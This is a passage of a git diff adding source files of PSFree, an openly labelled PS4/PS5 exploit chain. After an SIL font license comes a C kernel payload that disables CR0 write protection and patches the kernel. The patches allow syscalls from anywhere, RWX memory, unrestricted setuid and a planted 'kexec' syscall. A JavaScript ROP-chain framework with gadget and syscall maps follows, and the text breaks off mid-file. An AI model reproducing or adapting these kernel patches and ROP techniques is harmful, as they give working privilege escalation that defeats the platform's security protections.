+ with Reserved Font Arimo, Tinos and Cousine.
+Copyright (c) 2012 Red Hat, Inc.
+ with Reserved Font Name Liberation.
+
+This Font Software is licensed under the SIL Open Font License,
+Version 1.1.
+
+This license is copied below, and is also available with a FAQ at:
+http://scripts.sil.org/OFL
+
+SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
+
+PREAMBLE The goals of the Open Font License (OFL) are to stimulate
+worldwide development of collaborative font projects, to support the font
+creation efforts of academic and linguistic communities, and to provide
+a free and open framework in which fonts may be shared and improved in
+partnership with others.
+
+The OFL allows the licensed fonts to be used, studied, modified and
+redistributed freely as long as they are not sold by themselves.
+The fonts, including any derivative works, can be bundled, embedded,
+redistributed and/or sold with any software provided that any reserved
+names are not used by derivative works. The fonts and derivatives,
+however, cannot be released under any other type of license. The
+requirement for fonts to remain under this license does not apply to
+any document created using the fonts or their derivatives.
+
+
+
+DEFINITIONS
+"Font Software" refers to the set of files released by the Copyright
+Holder(s) under this license and clearly marked as such.
+This may include source files, build scripts and documentation.
+
+"Reserved Font Name" refers to any names specified as such after the
+copyright statement(s).
+
+"Original Version" refers to the collection of Font Software components
+as distributed by the Copyright Holder(s).
+
+"Modified Version" refers to any derivative made by adding to, deleting,
+or substituting ? in part or in whole ?
+any of the components of the Original Version, by changing formats or
+by porting the Font Software to a new environment.
+
+"Author" refers to any designer, engineer, programmer, technical writer
+or other person who contributed to the Font Software.
+
+
+PERMISSION & CONDITIONS
+
+Permission is hereby granted, free of charge, to any person obtaining a
+copy of the Font Software, to use, study, copy, merge, embed, modify,
+redistribute, and sell modified and unmodified copies of the Font
+Software, subject to the following conditions:
+
+1) Neither the Font Software nor any of its individual components,in
+ Original or Modified Versions, may be sold by itself.
+
+2) Original or Modified Versions of the Font Software may be bundled,
+ redistributed and/or sold with any software, provided that each copy
+ contains the above copyright notice and this license. These can be
+ included either as stand-alone text files, human-readable headers or
+ in the appropriate machine-readable metadata fields within text or
+ binary files as long as those fields can be easily viewed by the user.
+
+3) No Modified Version of the Font Software may use the Reserved Font
+ Name(s) unless explicit written permission is granted by the
+ corresponding Copyright Holder. This restriction only applies to the
+ primary font name as presented to the users.
+
+4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
+ Software shall not be used to promote, endorse or advertise any
+ Modified Version, except to acknowledge the contribution(s) of the
+ Copyright Holder(s) and the Author(s) or with their explicit written
+ permission.
+
+5) The Font Software, modified or unmodified, in part or in whole, must
+ be distributed entirely under this license, and must not be distributed
+ under any other license. The requirement for fonts to remain under
+ this license does not apply to any document created using the Font
+ Software.
+
+
+
+TERMINATION
+This license becomes null and void if any of the above conditions are not met.
+
+
+
+DISCLAIMER
+THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
+MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
+OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
+COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
+INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
+DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
+FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM OTHER
+DEALINGS IN THE FONT SOFTWARE.
diff --git a/src/fonts/LiberationMono-Regular.ttf b/src/fonts/LiberationMono-Regular.ttf
new file mode 100644
index 0000000..d91164d
Binary files /dev/null and b/src/fonts/LiberationMono-Regular.ttf differ
diff --git a/src/fonts/README.txt b/src/fonts/README.txt
new file mode 100644
index 0000000..067f156
--- /dev/null
+++ b/src/fonts/README.txt
@@ -0,0 +1,3 @@
+git: https://github.com/liberationfonts/liberation-fonts.git
+
+See FONTS.LICENSE for the license.
diff --git a/src/index.html b/src/index.html
new file mode 100644
index 0000000..004cca5
--- /dev/null
+++ b/src/index.html
@@ -0,0 +1,41 @@
+
+
+
+
+ exploit
+
+
+
+ PSFree: A PS4/PS5 Exploit Chain
+ Donation (Monero/XMR):
+ 86Fk3X9AE94EGKidzRbvyiVgGNYD3qZnuKNq1ZbsomFWXHYm6TtAgz9GNGitPWadkS3Wr9uXoT29U1SfdMtJ7QNKQpW1CVS
+ See JavaScript license information for the
+ source code and license.
+
+
+
+
diff --git a/src/kpatch/80x.c b/src/kpatch/80x.c
new file mode 100644
index 0000000..d08a559
--- /dev/null
+++ b/src/kpatch/80x.c
@@ -0,0 +1,176 @@
+/* Copyright (C) 2024-2025 anonymous
+
+This file is part of PSFree.
+
+PSFree is free software: you can redistribute it and/or modify
+it under the terms of the GNU Affero General Public License as
+published by the Free Software Foundation, either version 3 of the
+License, or (at your option) any later version.
+
+PSFree is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+GNU Affero General Public License for more details.
+
+You should have received a copy of the GNU Affero General Public License
+along with this program. If not, see . */
+
+#include
+
+#include "types.h"
+#include "utils.h"
+
+struct kexec_args {
+ u64 entry;
+ u64 arg1;
+ u64 arg2;
+ u64 arg3;
+ u64 arg4;
+ u64 arg5;
+};
+
+void do_patch(void);
+void restore(struct kexec_args *uap);
+
+__attribute__((section (".text.start")))
+int kpatch(void *td, struct kexec_args *uap) {
+ do_patch();
+ restore(uap);
+ return 0;
+}
+
+void restore(struct kexec_args *uap) {
+ u8 *pipe = uap->arg1;
+ u8 *pipebuf = uap->arg2;
+ for (size_t i = 0; i < 0x18; i++) {
+ pipe[i] = pipebuf[i];
+ }
+ u64 *pktinfo_field = uap->arg3;
+ *pktinfo_field = 0;
+ u64 *pktinfo_field2 = uap->arg4;
+ *pktinfo_field2 = 0;
+}
+
+void do_patch(void) {
+ // offset to fast_syscall()
+ const size_t off_fast_syscall = 0x1c0;
+ void * const kbase = (void *)rdmsr(0xc0000082) - off_fast_syscall;
+
+ disable_cr0_wp();
+
+ // patch amd64_syscall() to allow calling syscalls everywhere
+
+ // struct syscall_args sa; // initialized already
+ // u64 code = get_u64_at_user_address(td->tf_frame-tf_rip);
+ // int is_invalid_syscall = 0
+ //
+ // // check the calling code if it looks like one of the syscall stubs at a
+ // // libkernel library and check if the syscall number correponds to the
+ // // proper stub
+ // if ((code & 0xff0000000000ffff) != 0x890000000000c0c7
+ // || sa.code != (u32)(code >> 0x10)
+ // ) {
+ // // patch this to " = 0" instead
+ // is_invalid_syscall = -1;
+ // }
+ write32(kbase, 0x490, 0);
+ // these code corresponds to the check that ensures that the caller's
+ // instruction pointer is inside the libkernel library's memory range
+ //
+ // // patch the check to always go to the "goto do_syscall;" line
+ // void *code = td->td_frame->tf_rip;
+ // if (libkernel->start <= code && code < libkernel->end
+ // && is_invalid_syscall == 0
+ // ) {
+ // goto do_syscall;
+ // }
+ //
+ // do_syscall:
+ // ...
+ // lea rsi, [rbp - 0x78]
+ // mov rdi, rbx
+ // mov rax, qword [rbp - 0x80]
+ // call qword [rax + 8] ; error = (sa->callp->sy_call)(td, sa->args)
+ //
+ // sy_call() is the function that will execute the requested syscall.
+ write16(kbase, 0x4b5, 0x9090);
+ write16(kbase, 0x4b9, 0x9090);
+ write8(kbase, 0x4c2, 0xeb);
+
+ // patch sys_mmap() to allow rwx mappings
+
+ // patch maximum cpu mem protection: 0x33 -> 0x37
+ // the ps4 added custom protections for their gpu memory accesses
+ // GPU X: 0x8 R: 0x10 W: 0x20
+ // that's why you see other bits set
+ // ref: https://cturt.github.io/ps4-2.html
+ write8(kbase, 0xfd03a, 0x37);
+ write8(kbase, 0xfd03d, 0x37);
+
+ // patch vm_map_protect() (called by sys_mprotect()) to allow rwx mappings
+ //
+ // this check is skipped after the patch
+ //
+ // if ((new_prot & current->max_protection) != new_prot) {
+ // vm_map_unlock(map);
+ // return (KERN_PROTECTION_FAILURE);
+ // }
+ write32(kbase, 0x3ec68d, 0);
+
+ // patch sys_dynlib_dlsym() to allow dynamic symbol resolution everywhere
+
+ // call ...
+ // mov r14, qword [rbp - 0xad0]
+ // cmp eax, 0x4000000
+ // jb ... ; patch jb to jmp
+ write8(kbase, 0x31953f, 0xeb);
+ // patch called function to always return 0
+ //
+ // sys_dynlib_dlsym:
+ // ...
+ // mov edi, 0x10 ; 16
+ // call patched_function ; kernel_base + 0x951c0
+ // test eax, eax
+ // je ...
+ // mov rax, qword [rbp - 0xad8]
+ // ...
+ // patched_function: ; patch to "xor eax, eax; ret"
+ // push rbp
+ // mov rbp, rsp
+ // ...
+ write32(kbase, 0x951c0, 0xC3C03148);
+
+ // patch sys_setuid() to allow freely changing the effective user ID
+
+ // ; PRIV_CRED_SETUID = 50
+ // call priv_check_cred(oldcred, PRIV_CRED_SETUID, 0)
+ // test eax, eax
+ // je ... ; patch je to jmp
+ write8(kbase, 0x34d696, 0xeb);
+
+ // overwrite the entry of syscall 11 (unimplemented) in sysent
+ //
+ // struct args {
+ // u64 rdi;
+ // u64 rsi;
+ // u64 rdx;
+ // u64 rcx;
+ // u64 r8;
+ // u64 r9;
+ // };
+ //
+ // int sys_kexec(struct thread td, struct args *uap) {
+ // asm("jmp qword ptr [rsi]");
+ // }
+
+ // sysent[11]
+ const size_t offset_sysent_11 = 0x10fc6e0;
+ // .sy_narg = 6
+ write32(kbase, offset_sysent_11, 6);
+ // .sy_call = gadgets['jmp qword ptr [rsi]']
+ write64(kbase, offset_sysent_11 + 8, kbase + 0xe629c);
+ // .sy_thrcnt = SY_THR_STATIC
+ write32(kbase, offset_sysent_11 + 0x2c, 1);
+
+ enable_cr0_wp();
+}
diff --git a/src/kpatch/Makefile b/src/kpatch/Makefile
new file mode 100644
index 0000000..c6cb539
--- /dev/null
+++ b/src/kpatch/Makefile
@@ -0,0 +1,27 @@
+TARGET = 80x
+ENTRY = 0x900000000
+src = $(TARGET).c
+
+CC = gcc
+CFLAGS = -O -Wno-int-conversion -fno-strict-aliasing -masm=intel -nostartfiles
+CFLAGS += -fwrapv -no-pie -Ttext=$(ENTRY) -Tscript.ld -Wl,--build-id=none
+CFLAGS += -fwrapv-pointer -std=gnu11
+
+.PHONY: all
+all: $(TARGET).elf
+
+$(TARGET).elf: $(TARGET).o
+ $(CC) $(TARGET).o -o $(TARGET).elf $(CFLAGS)
+
+.PHONY: clean
+clean:
+ -rm -f *.d *.o *.elf
+
+%.d: %.c
+ @set -e; \
+ rm -f $@; \
+ $(CC) -MM $(CPPFLAGS) $< > $@.$$$$; \
+ sed 's,\($*\)\.o[ :]*,\1.o $@ : ,g' < $@.$$$$ > $@; \
+ rm -f $@.$$$$;
+
+include $(src:.c=.d)
diff --git a/src/kpatch/script.ld b/src/kpatch/script.ld
new file mode 100644
index 0000000..879b98b
--- /dev/null
+++ b/src/kpatch/script.ld
@@ -0,0 +1,8 @@
+SECTIONS
+{
+ .text : { *(.text.start) *(.text) }
+ .rodata : { *(.rodata) }
+ .data : { *(.data) }
+ .bss : { *(.bss) }
+ /DISCARD/ : { *(.comment* .note*) }
+}
diff --git a/src/kpatch/types.h b/src/kpatch/types.h
new file mode 100644
index 0000000..bcd075a
--- /dev/null
+++ b/src/kpatch/types.h
@@ -0,0 +1,28 @@
+/* Copyright (C) 2024 anonymous
+
+This file is part of PSFree.
+
+PSFree is free software: you can redistribute it and/or modify
+it under the terms of the GNU Affero General Public License as
+published by the Free Software Foundation, either version 3 of the
+License, or (at your option) any later version.
+
+PSFree is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+GNU Affero General Public License for more details.
+
+You should have received a copy of the GNU Affero General Public License
+along with this program. If not, see . */
+
+#pragma once
+
+typedef unsigned char u8;
+typedef unsigned short u16;
+typedef unsigned int u32;
+typedef unsigned long long u64;
+
+typedef signed char s8;
+typedef signed short s16;
+typedef signed int s32;
+typedef signed long long s64;
diff --git a/src/kpatch/utils.h b/src/kpatch/utils.h
new file mode 100644
index 0000000..0c06168
--- /dev/null
+++ b/src/kpatch/utils.h
@@ -0,0 +1,61 @@
+/* Copyright (C) 2024 anonymous
+
+This file is part of PSFree.
+
+PSFree is free software: you can redistribute it and/or modify
+it under the terms of the GNU Affero General Public License as
+published by the Free Software Foundation, either version 3 of the
+License, or (at your option) any later version.
+
+PSFree is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+GNU Affero General Public License for more details.
+
+You should have received a copy of the GNU Affero General Public License
+along with this program. If not, see . */
+
+#pragma once
+
+#include
+
+#include "types.h"
+
+inline u64 rdmsr(u32 msr) {
+ u32 low, high;
+
+ asm("rdmsr" : "=a" (low), "=d" (high) : "c" (msr));
+ return (low | ((u64)high << 32));
+}
+
+inline void enable_cr0_wp(void) {
+ asm(
+ "mov rax, cr0\n"
+ "or rax, 0x10000\n"
+ "mov cr0, rax\n"
+ ::: "rax");
+}
+
+inline void disable_cr0_wp(void) {
+ asm(
+ "mov rax, cr0\n"
+ "and rax, ~0x10000\n"
+ "mov cr0, rax\n"
+ ::: "rax");
+}
+
+inline void write8(void *addr, size_t offset, u8 value) {
+ *(u8 *)(addr + offset) = value;
+}
+
+inline void write16(void *addr, size_t offset, u16 value) {
+ *(u16 *)(addr + offset) = value;
+}
+
+inline void write32(void *addr, size_t offset, u32 value) {
+ *(u32 *)(addr + offset) = value;
+}
+
+inline void write64(void *addr, size_t offset, u64 value) {
+ *(u64 *)(addr + offset) = value;
+}
diff --git a/src/module/chain.mjs b/src/module/chain.mjs
new file mode 100644
index 0000000..48701b7
--- /dev/null
+++ b/src/module/chain.mjs
@@ -0,0 +1,581 @@
+/* Copyright (C) 2023-2025 anonymous
+
+This file is part of PSFree.
+
+PSFree is free software: you can redistribute it and/or modify
+it under the terms of the GNU Affero General Public License as
+published by the Free Software Foundation, either version 3 of the
+License, or (at your option) any later version.
+
+PSFree is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+GNU Affero General Public License for more details.
+
+You should have received a copy of the GNU Affero General Public License
+along with this program. If not, see . */
+
+import { Int, lohi_from_one } from './int64.mjs';
+import { get_view_vector } from './memtools.mjs';
+import { Addr } from './mem.mjs';
+
+import * as config from '/config.mjs';
+
+// put the sycall names that you want to use here
+export const syscall_map = new Map(Object.entries({
+ 'read' : 3,
+ 'write' : 4,
+ 'open' : 5,
+ 'close' : 6,
+ 'getpid' : 20,
+ 'setuid' : 23,
+ 'getuid' : 24,
+ 'accept' : 30,
+ 'pipe' : 42,
+ 'ioctl' : 54,
+ 'munmap' : 73,
+ 'mprotect' : 74,
+ 'fcntl' : 92,
+ 'socket' : 97,
+ 'connect' : 98,
+ 'bind' : 104,
+ 'setsockopt' : 105,
+ 'listen' : 106,
+ 'getsockopt' : 118,
+ 'fchmod' : 124,
+ 'socketpair' : 135,
+ 'fstat' : 189,
+ 'getdirentries' : 196,
+ '__sysctl' : 202,
+ 'mlock' : 203,
+ 'clock_gettime' : 232,
+ 'nanosleep' : 240,
+ 'sched_yield' : 331,
+ 'kqueue' : 362,
+ 'kevent' : 363,
+ 'rtprio_thread' : 466,
+ 'mmap' : 477,
+ 'ftruncate' : 480,
+ 'shm_open' : 482,
+ 'cpuset_getaffinity' : 487,
+ 'cpuset_setaffinity' : 488,
+ 'jitshm_create' : 533,
+ 'jitshm_alias' : 534,
+ 'evf_create' : 538,
+ 'evf_delete' : 539,
+ 'evf_set' : 544,
+ 'evf_clear' : 545,
+ 'set_vm_container' : 559,
+ 'dmem_container' : 586,
+ 'dynlib_dlsym' : 591,
+ 'dynlib_get_list' : 592,
+ 'dynlib_get_info' : 593,
+ 'dynlib_load_prx' : 594,
+ 'randomized_path' : 602,
+ 'budget_get_ptype' : 610,
+ 'thr_suspend_ucontext' : 632,
+ 'thr_resume_ucontext' : 633,
+ 'blockpool_open' : 653,
+ 'blockpool_map' : 654,
+ 'blockpool_unmap' : 655,
+ 'blockpool_batch' : 657,
+ // syscall 661 is unimplemented so free for use. a kernel exploit will
+ // install "kexec" here
+ 'aio_submit' : 661,
+ 'kexec' : 661,
+ 'aio_multi_delete' : 662,
+ 'aio_multi_wait' : 663,
+ 'aio_multi_poll' : 664,
+ 'aio_multi_cancel' : 666,
+ 'aio_submit_cmd' : 669,
+ 'blockpool_move' : 673,
+}));
+
+const argument_pops = [
+ 'pop rdi; ret',
+ 'pop rsi; ret',
+ 'pop rdx; ret',
+ 'pop rcx; ret',
+ 'pop r8; ret',
+ 'pop r9; ret',
+];
+
+// implementations are expected to have these gadgets:
+// * libSceLibcInternal:
+// * __errno - FreeBSD's function to get the location of errno
+// * setcontext - what we call Sony's own version of _Ux86_64_setcontext
+// * getcontext - what we call Sony's own version of _Ux86_64_getcontext
+// * anywhere:
+// * the gadgets at argument_pops
+// * ret
+//
+// setcontext/getcontext naming came from this project:
+// https://github.com/libunwind/libunwind
+//
+// setcontext(context *ctx):
+// mov rax, qword [rdi + 0x38]
+// sub rax, 0x10 ; 16
+// mov qword [rdi + 0x38], rax
+// mov rbx, qword [rdi + 0x20]
+// mov qword [rax], rbx
+// mov rbx, qword [rdi + 0x80]
+// mov qword [rax + 8], rbx
+// mov rax, qword [rdi]
+// mov rbx, qword [rdi + 8]
+// mov rcx, qword [rdi + 0x10]
+// mov rdx, qword [rdi + 0x18]
+// mov rsi, qword [rdi + 0x28]
+// mov rbp, qword [rdi + 0x30]
+// mov r8, qword [rdi + 0x40]
+// mov r9, qword [rdi + 0x48]
+// mov r10, qword [rdi + 0x50]
+// mov r11, qword [rdi + 0x58]
+// mov r12, qword [rdi + 0x60]
+// mov r13, qword [rdi + 0x68]
+// mov r14, qword [rdi + 0x70]
+// mov r15, qword [rdi + 0x78]
+// cmp qword [rdi + 0xb0], 0x20001
+// jne done
+// cmp qword [rdi + 0xb8], 0x10002
+// jne done
+// fxrstor [rdi + 0xc0]
+// done:
+// mov rsp, qword [rdi + 0x38]
+// pop rdi
+// ret
+//
+// getcontext(context *ctx):
+// mov qword [rdi], rax
+// mov qword [rdi + 8], rbx
+// mov qword [rdi + 0x10], rcx
+// mov qword [rdi + 0x18], rdx
+// mov qword [rdi + 0x20], rdi
+// mov qword [rdi + 0x28], rsi
+// mov qword [rdi + 0x30], rbp
+// mov qword [rdi + 0x38], rsp
+// add qword [rdi + 0x38], 8
+// mov qword [rdi + 0x40], r8
+// mov qword [rdi + 0x48], r9
+// mov qword [rdi + 0x50], r10
+// mov qword [rdi + 0x58], r11
+// mov qword [rdi + 0x60], r12
+// mov qword [rdi + 0x68], r13
+// mov qword [rdi + 0x70], r14
+// mov qword [rdi + 0x78], r15
+// mov rsi, qword [rsp]
+// mov qword [rdi + 0x80], rsi
+// fxsave [rdi + 0xc0]
+// mov qword [rdi + 0xb0], 0x20001
+// mov qword [rdi + 0xb8], 0x10002
+// xor eax, eax
+// ret
+
+// ROP chain manager base class
+//
+// Args:
+// stack_size: the size of the stack
+// upper_pad: the amount of extra space above stack
+export class ChainBase {
+ constructor(stack_size=0x1000, upper_pad=0x10000) {
+ this._is_dirty = false;
+ this.position = 0;
+
+ const return_value = new Uint32Array(4);
+ this._return_value = return_value;
+ this.retval_addr = get_view_vector(return_value);
+
+ const errno = new Uint32Array(1);
+ this._errno = errno;
+ this.errno_addr = get_view_vector(errno);
+
+ const full_stack_size = upper_pad + stack_size;
+ const stack_buffer = new ArrayBuffer(full_stack_size);
+ const stack = new DataView(stack_buffer, upper_pad);
+ this.stack = stack;
+ this.stack_addr = get_view_vector(stack);
+ this.stack_size = stack_size;
+ this.full_stack_size = full_stack_size;
+ }
+
+ // use this if you want to write a new ROP chain but don't want to allocate
+ // a new instance
+ empty() {
+ this.position = 0;
+ }
+
+ // flag indicating whether .run() was ever called with this chain
+ get is_dirty() {
+ return this._is_dirty;
+ }
+
+ clean() {
+ this._is_dirty = false;
+ }
+
+ dirty() {
+ this._is_dirty = true;
+ }
+
+ check_allow_run() {
+ if (this.position === 0) {
+ throw Error('chain is empty');
+ }
+ if (this.is_dirty) {
+ throw Error('chain already ran, clean it first');
+ }
+ }
+
+ reset() {
+ this.empty();
+ this.clean();
+ }
+
+ get retval_int() {
+ return this._return_value[0] | 0;
+ }
+
+ get retval() {
+ return new Int(this._return_value[0], this._return_value[1]);
+ }
+
+ // return value as a pointer
+ get retval_ptr() {
+ return new Addr(this._return_value[0], this._return_value[1]);
+ }
+
+ set retval(value) {
+ const values = lohi_from_one(value);
+ const retval = this._return_value;
+ retval[0] = values[0];
+ retval[1] = values[1];
+ }
+
+ get retval_all() {
+ const retval = this._return_value;
+ return [new Int(retval[0], retval[1]), new Int(retval[2], retval[3])];
+ }
+
+ set retval_all(values) {
+ const [a, b] = [lohi_from_one(values[0]), lohi_from_one(values[1])];
+ const retval = this._return_value;
+ retval[0] = a[0];
+ retval[1] = a[1];
+ retval[2] = b[0];
+ retval[3] = b[1];
+ }
+
+ get errno() {
+ return this._errno[0];
+ }
+
+ set errno(value) {
+ this._errno[0] = value;
+ }
+
+ push_value(value) {
+ const position = this.position;
+ if (position >= this.stack_size) {
+ throw Error(`no more space on the stack, pushed value: ${value}`);
+ }
+
+ const values = lohi_from_one(value);
+ const stack = this.stack;
+ stack.setUint32(position, values[0], true);
+ stack.setUint32(position + 4, values[1], true);
+
+ this.position += 8;
+ }
+
+ get_gadget(insn_str) {
+ const addr = this.gadgets.get(insn_str);
+ if (addr === undefined) {
+ throw Error(`gadget not found: ${insn_str}`);
+ }
+
+ return addr;
+ }
+
+ push_gadget(insn_str) {
+ this.push_value(this.get_gadget(insn_str));
+ }
+
+ push_call(func_addr, ...args) {
+ if (args.length > 6) {
+ throw TypeError(
+ 'push_call() does not support functions that have more than 6'
+ + ' arguments');
+ }
+
+ for (let i = 0; i < args.length; i++) {
+ this.push_gadget(argument_pops[i]);
+ this.push_value(args[i]);
+ }
+
+ // The address of our buffer seems to be always aligned to 8 bytes.
+ // SysV calling convention requires the stack is aligned to 16 bytes on
+ // function entry, so push an additional 8 bytes to pad the stack. We
+ // pushed a "ret" gadget for a noop.
+ if ((this.position & (0x10 - 1)) !== 0) {
+ this.push_gadget('ret');
+ }
+
+ if (typeof func_addr === 'string') {
+ this.push_gadget(func_addr);
+ } else {
+ this.push_value(func_addr);
+ }
+ }
+
+ push_syscall(syscall_name, ...args) {
+ if (typeof syscall_name !== 'string') {
+ throw TypeError(`syscall_name not a string: ${syscall_name}`);
+ }
+
+ const sysno = syscall_map.get(syscall_name);
+ if (sysno === undefined) {
+ throw Error(`syscall_name not found: ${syscall_name}`);
+ }
+
+ const syscall_addr = this.syscall_array[sysno];
+ if (syscall_addr === undefined) {
+ throw Error(`syscall number not in syscall_array: ${sysno}`);
+ }
+
+ this.push_call(syscall_addr, ...args);
+ }
+
+ // Sets needed class properties
+ //
+ // Args:
+ // gadgets:
+ // A Map-like object mapping instruction strings (e.g. "pop rax; ret")
+ // to their addresses in memory.
+ // syscall_array:
+ // An array whose indices correspond to syscall numbers. Maps syscall
+ // numbers to their addresses in memory. Defaults to an empty Array.
+ static init_class(gadgets, syscall_array=[]) {
+ this.prototype.gadgets = gadgets;
+ this.prototype.syscall_array = syscall_array;
+ }
+
+ // START: implementation-dependent parts
+ //
+ // the user doesn't need to implement all of these. just the ones they need
+
+ // Firmware specific method to launch a ROP chain
+ //
+ // Proper implementations will check if .position is nonzero before
+ // running. Implementations can optionally check .is_dirty to enforce
+ // single-run gadget sequences
+ run() {
+ throw Error('not implemented');
+ }
+
+ // anything you need to do before the ROP chain jumps back to JavaScript
+ push_end() {
+ throw Error('not implemented');
+ }
+
+ push_get_errno() {
+ throw Error('not implemented');
+ }
+
+ push_clear_errno() {
+ throw Error('not implemented');
+ }
+
+ // get the rax register
+ push_get_retval() {
+ throw Error('not implemented');
+ }
+
+ // get the rax and rdx registers
+ push_get_retval_all() {
+ throw Error('not implemented');
+ }
+
+ // END: implementation-dependent parts
+
+ // note that later firmwares (starting around > 5.00?), the browser doesn't
+ // have a JIT compiler. we programmed in a way that tries to make the
+ // resulting bytecode be optimal
+ //
+ // we intentionally have an incomplete set (there's no function to get a
+ // full 128-bit result). we only implemented what we think are the common
+ // cases. the user will have to implement those other functions if they
+ // need it
+
+ do_call(...args) {
+ if (this.position) {
+ throw Error('chain not empty');
+ }
+ try {
+ this.push_call(...args);
+ this.push_get_retval();
+ this.push_get_errno();
+ this.push_end();
+ this.run();
+ } finally {
+ this.reset();
+ }
+ }
+
+ call_void(...args) {
+ this.do_call(...args);
+ }
+
+ call_int(...args) {
+ this.do_call(...args);
+ // x | 0 will always be a signed integer
+ return this._return_value[0] | 0;
+ }
+
+ call(...args) {
+ this.do_call(...args);
+ const retval = this._return_value;
+ return new Int(retval[0], retval[1]);
+ }
+
+ do_syscall(...args) {
+ if (this.position) {
+ throw Error('chain not empty');
+ }
+ try {
+ this.push_syscall(...args);
+ this.push_get_retval();
+ this.push_get_errno();
+ this.push_end();
+ this.run();
+ } finally {
+ this.reset();
+ }
+ }
+
+ syscall_void(...args) {
+ this.do_syscall(...args);
+ }
+
+ syscall_int(...args) {
+ this.do_syscall(...args);
+ // x | 0 will always be a signed integer
+ return this._return_value[0] | 0;
+ }
+
+ syscall(...args) {
+ this.do_syscall(...args);
+ const retval = this._return_value;
+ return new Int(retval[0], retval[1]);
+ }
+
+ syscall_ptr(...args) {
+ this.do_syscall(...args);
+ const retval = this._return_value;
+ return new Addr(retval[0], retval[1]);
+ }
+
+ // syscall variants that throw an error on errno
+
+ do_syscall_clear_errno(...args) {
+ if (this.position) {
+ throw Error('chain not empty');
+ }
+ try {
+ this.push_clear_errno();
+ this.push_syscall(...args);
+ this.push_get_retval();
+ this.push_get_errno();
+ this.push_end();
+ this.run();
+ } finally {
+ this.reset();
+ }
+ }
+
+ sysi(...args) {
+ const errno = this._errno;
+ this.do_syscall_clear_errno(...args);
+
+ const err = errno[0];
+ if (err !== 0) {
+ throw Error(`syscall(${args[0]}) errno: ${err}`);
+ }
+
+ // x | 0 will always be a signed integer
+ return this._return_value[0] | 0;
+ }
+
+ sys(...args) {
+ const errno = this._errno;
+ this.do_syscall_clear_errno(...args);
+
+ const err = errno[0];
+ if (err !== 0) {
+ throw Error(`syscall(${args[0]}) errno: ${err}`);
+ }
+
+ const retval = this._return_value;
+ return new Int(retval[0], retval[1]);
+ }
+
+ sysp(...args) {
+ const errno = this._errno;
+ this.do_syscall_clear_errno(...args);
+
+ const err = errno[0];
+ if (err !== 0) {
+ throw Error(`syscall(${args[0]}) errno: ${err}`);
+ }
+
+ const retval = this._return_value;
+ return new Addr(retval[0], retval[1]);
+ }
+}
+
+export function get_gadget(map, insn_str) {
+ const addr = map.get(insn_str);
+ if (addr === undefined) {
+ throw Error(`gadget not found: ${insn_str}`);
+ }
+
+ return addr;
+}
+
+function load_fw_specific(version) {
+ if (version & 0x10000) {
+ throw RangeError('ps5 not supported yet');
+ }
+
+ const value = version & 0xffff;
+ // we don't want to bother with very old firmwares that don't support
+ // ECMAScript 2015. 6.xx WebKit poisons the pointer fields of some types
+ // which can be annoying to deal with
+ if (value < 0x700) {
+ throw RangeError("PS4 firmwares < 7.00 isn't supported");
+ }
+
+ if (0x800 <= value && value < 0x850) {
+ return import('/rop/800.mjs');
+ }
+
+ throw RangeError('firmware not supported');
+}
+
+export let gadgets = null;
+export let libwebkit_base = null;
+export let libkernel_base = null;
+export let libc_base = null;
+export let init_gadget_map = null;
+export let Chain = null;
+
+export async function init() {
+ const module = await load_fw_specific(config.target);
+ Chain = module.Chain;
+ module.init(Chain);
+ ({
+ gadgets,
+ libwebkit_base,
+ libkernel_base,
+ libc_base,
+ init_gadget_map,
+ } = module);
+}
diff --git a/src/module/int64.mjs b/src/module/int64.mjs
new file mode 100644
index 0000000..248872e
--- /dev/null
+++ b/src/module/int64.mjs
@@ -0,0 +1,133 @@
+/* Copyright (C) 2023-2025 anonymous
+
+This file is part of PSFree.
+
+PSFree is free software: you can redistribute it and/or modify
+it under the terms of the GNU Affero General Public License as
+published by the Free Software Foundation, either version 3 of the
+License, or (at your option) any later version.
+
+PSFree is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+GNU Affero General Public License for more details.
+
+You should have received a copy of the GNU Affero General Public License
+along with this program. If not, see . */
+
+// cache some constants
+const isInteger = Number.isInteger;
+
+function check_not_in_range(x) {
+ return !(isInteger(x) && -0x80000000 <= x && x <= 0xffffffff);
+}
+
+// use this if you want to support objects convertible to Int but only need
+// their low/high bits. creating a Int is slower compared to just using this
+// function
+export function lohi_from_one(low) {
+ if (low instanceof Int) {
+ return low._u32.slice();
+ }
+
+ if (check_not_in_range(low)) {
+ throw TypeError(`low not a 32-bit integer: ${low}`);
+ }
+
+ return [low >>> 0, low < 0 ? -1 >>> 0 : 0];
+}
+
+// immutable 64-bit integer
+export class Int {
+ constructor(low, high) {
+ if (high === undefined) {
+ this._u32 = new Uint32Array(lohi_from_one(low));
+ return;
+ }
+
+ if (check_not_in_range(low)) {
+ throw TypeError(`low not a 32-bit integer: ${low}`);
+ }
+
+ if (check_not_in_range(high)) {
+ throw TypeError(`high not a 32-bit integer: ${high}`);
+ }
+
+ this._u32 = new Uint32Array([low, high]);
+ }
+
+ get lo() {
+ return this._u32[0];
+ }
+
+ get hi() {
+ return this._u32[1];
+ }
